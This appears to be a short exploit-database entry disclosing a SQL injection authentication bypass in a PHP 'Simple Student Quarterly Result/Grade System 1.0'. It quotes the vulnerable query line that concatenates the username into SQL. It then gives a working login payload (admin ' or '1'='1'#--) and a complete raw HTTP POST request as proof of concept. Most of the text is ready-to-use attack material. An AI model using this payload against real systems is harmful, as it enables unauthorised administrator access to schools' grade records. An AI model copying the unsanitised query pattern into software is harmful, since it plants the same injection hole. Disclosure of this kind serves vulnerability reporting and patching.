# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass # Date: 11/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux # Vulnerable Code line 57 in file "/sqgs/Actions.php" @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count']; Steps To Reproduce: * - Go to the login page http://localhost/sqgs/login.php Payload: username: admin ' or '1'='1'#-- password: \ Proof of Concept : POST /sqgs/Actions.php?a=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: http://localhost Connection: close Referer: http://localhost/sqgs/login.php Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi